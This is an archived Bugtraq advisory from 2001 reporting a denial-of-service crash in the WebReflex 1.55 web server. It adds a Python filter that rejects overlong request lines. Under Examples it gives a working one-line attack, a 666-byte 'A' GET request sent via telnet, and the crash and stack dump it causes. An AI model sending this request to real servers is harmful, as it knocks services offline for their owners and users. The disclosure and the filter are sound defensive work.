Bugtraq mailing list archives

WebReflex 1.55 HTTPd DoS


From: slipy () B10Z NET
Date: Tue, 27 Feb 2001 05:34:43 -0000

Introduction:

WebReflex is an easy-to-use web server that's easy to set up and use. It has many features, like a limitless amount of concurrent requests, drive and directory lists, built-in server-side image maps, implementation of the CGI-WIN standard, user-defined directory index files, user-defined error files, built-in MIME type mappings plus user-defined mappings, built-in server-push using sequence files, a log file using the common log file format, and all the rest. The best feature of this server is the ability to run it from a CD-ROM.


The vendor's website is:
http://www.sapio.com/reflex/


Problem: Denial of Service Attack

WebReflex 1.55 is vulnerable to a simple Denial of Service attack that causes the program to raise a General Protection Fault and quit. WebReflex runs on the Microsoft (c) operating systems; all appear to be vulnerable.


Examples:

echo "GET " `perl -e 'print "A" x 666'` | telnet 192.168.0.20 80

^^ This will cause the program to quit within seconds and display:

REFLEX16 caused a general protection fault
in module KRNL386.EXE at 0001:00008aee.
Registers:
EAX=86cf0000 CS=014f EIP=00008aee 
EFLGS=00000282 EBX=830f000a SS=86f7 
ESP=00008d86 EBP=00008da0 ECX=0000000a 
DS=0167 ESI=00009051 FS=0000 EDX=ffff8dae 
ES=86ef EDI=00008c82 GS=0000
Bytes at CS:EIP:
07 1f 61 c3 06 2e 8e 06 02 00 26 89 16 f4 12 26 
Stack dump:
41414141 41414141 41414141 41414141 41414141 
41414141 41414141 41414141 41414141 41414141 
41414141 41414141 41414141 41414141 41414141 
41414141 

Solution:

The vendor has been notified; waiting for a reply.

--------------------
b10z HTTPd Advisory
slipy () b10z net

Found: February 27th, 2001.
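
A defensive check for the overlong request line shown under Examples, as an added example that is not part of the original advisory: a front-end filter that rejects such a request line before it reaches the server. The function name `screen_request_line`, the 255-byte cap and the 64-byte filler threshold are assumptions, since the advisory does not state the length at which the fault starts.

```python
import re
from typing import Tuple

# Assumed limits: the advisory shows that 666 filler bytes crash the server
# but does not state the smallest length that does.
MAX_REQUEST_LINE = 255   # assumed cap on the whole request line, in bytes
MIN_RUN = 64             # assumed: this many identical bytes in a row is filler

# METHOD SP URI [SP HTTP-version]; the version is optional (HTTP/0.9 style).
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+)(?: (HTTP/\d\.\d))?$")
FILLER_RUN = re.compile(rb"(.)\1{%d,}" % (MIN_RUN - 1), re.DOTALL)


def screen_request_line(raw: bytes) -> Tuple[int, str]:
    """Return (status, reason): 200 means forward, 4xx means reject up front."""
    line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    if len(line) > MAX_REQUEST_LINE:
        reason = "request line too long"
        if FILLER_RUN.search(line):
            reason += ", repeated-byte filler"   # worth an alert, not just a 414
        return 414, reason
    if REQUEST_LINE.match(line) is None:
        return 400, "malformed request line"
    return 200, "ok"


if __name__ == "__main__":
    # Constructed sample inputs, not captured traffic.
    samples = [
        b"GET /index.html HTTP/1.0\r\n",
        b"GET /index.html\n",
        b"GET  " + b"A" * 666 + b"\n",   # shape of the request in the advisory
        b"GET \n",
    ]
    for s in samples:
        print(screen_request_line(s), s[:40])
```

The length check runs before any parsing so that an oversized line is never handed to pattern matching or to the backend.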

